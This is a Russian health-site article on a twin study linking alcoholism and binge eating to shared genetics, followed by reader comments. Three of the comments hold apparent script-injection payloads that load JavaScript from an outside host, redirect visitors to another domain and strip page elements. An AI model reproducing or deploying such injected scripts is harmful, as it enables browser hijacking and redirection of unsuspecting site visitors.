Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Алкоголизм и обжорство - ...  >>  Алкоголизм и обжорство - две стороны одной медали
 
Обратная связь
 

Алкоголизм и обжорство - две стороны одной медали

Размер шрифта
05 ноября 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Сенсационное открытие: люди, склонные к перееданию, с большей вероятностью становятся алкоголиками, и наоборот. Ученые из Америки считают, что корень этой взаимосвязи лежит в генетике.

Алкоголизм и обжорство– две стороны одной монеты?

Исследователи обнаружили общие генетические факторы, лежащие в основе алкоголизма и специфических симптомов расстройств пищевого поведения (особенно нервной булимии).

«В прошлом наши коллеги уже отмечали тот факт, что среди людей с пищевыми нарушениями больше алкоголиков, чем среди популяции в целом», – рассказывает Мелисса Манн-Чернофф,один из научных сотрудников Вашингтонской медицинской школы (Сент-Луи, США). «Мы же попытались рассмотреть эту ситуации глубже и выяснить, какие причины лежат в основе этого явления».

С этой целью исследовательская группа проанализировала данные, касающиеся примерно 6000 близнецов из Австралии. В этой группе были как идентичные близнецы, у которых абсолютно одинаковый состав генов, так и разнояйцевые, чьи гены совпадают лишь наполовину. Близнецовый метод давно используется в клинической генетике, и цель его проста – выявить, какую роль в проявлении признака играет наследственность, а какую – среда.

«Этот метод очень важен на начальном этапе: если здесь мы не обнаруживаем влияния наследственности, то изучать непосредственно гены нет никакого смысла», – поясняет Манн-Чернофф. «И напротив, если признак ярко проявляется только у идентичных близнецов, значит, есть какая-то генетическая подоплека, которая нуждается в более детальном рассмотрении».

Ученые провели серию диагностических опросов, в которых заострялось внимание на пищевых и алкогольных привычках. Они обнаружили, что примерно 25% мужчин и 6% женщин, из числа опрашиваемых, страдали от алкогольной зависимости в той или иной степени, а 11% и 13% соответственно – от переедания. При этом 14% женщин вызывали у себя рвоту или прибегали к другим методикам избавления от поглощенной пищи(в опросниках для мужчин этот пункт отсутствовал).

Таким образом, сопоставляя результаты опросов среди близнецов, ученые пришли к выводу, что именно генетика является главным фактором развития этих проблем,обуславливая от 38 до 53% его риска.

Тем не менее, Манн-Чернофф, предостерегает от недооценки факторов внешней среды, которые тоже играют свою роль.

«Подобные исследования всегда подливают масла в огонь горячей дискуссии, которая посвящена влиянию внешних и внутренних факторов на выраженность признака», – говорит она. «Хотя во всех случаях свой вклад вносит и то, и другое. В ходе выполнения нашего исследования мы не сумели найти значимых внешних факторов, но это совсем не значит, что их нет, и они не играют никакой роли».

Следующий шаг ученых – поиск конкретных генов, которые обуславливают взаимосвязь между пищевым поведением и склонностью к алкоголизму. В то же время исследователи ставят и более глобальную цель – объединить в сознании врачей алкоголизм и переедание в единый феномен. Доктор Манн-Чернофф убеждена, что наличие симптомов одного из этих нарушений обязательно должноподвигнуть врача проверить и второе.

Ну, а вы, тем временем, посетите наши специальные проекты «Сбрось лишнее» и «Заботься о печени». Там вы найдете бездну дополнительной информации о переедании, алкоголизме и не только.

Результаты исследования, описанного в данной статье, были опубликованы в журнале Journal of Studies on Alcohol and Drugs.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:56

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 18:56

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:55

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

4 - LebedevVP

19 января 2016 в 21:53

Цитировать   |   Пожаловаться

К сожалению так и есть. Страдаю и тем и другим. Но держу под контролем...

5 - LebedevVP

19 января 2016 в 21:53

Цитировать   |   Пожаловаться

К сожалению так и есть. Страдаю и тем и другим. Но держу под контролем...

6 - LebedevVP

19 января 2016 в 21:53

Цитировать   |   Пожаловаться

К сожалению так и есть. Страдаю и тем и другим. Но держу под контролем...

Статьи

       
В новый год – с новым весом!   Сколько надо сбросить, чтобы не заболеть раком! Ответ в конце статьи!   Как воспитывать ребенка, чтобы он не был толстым?   Старт нового сезона проекта «Сбрось лишнее»  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
11 июня 2013Для похудения больше не нужна операция! Новый метод лечения делает потерю веса плевым делом 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 

Слайдшоу

1
Как студенческая жизнь влияет на здоровье
Как похудеть, ничего не делая
Как натренировать волю и похудеть?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.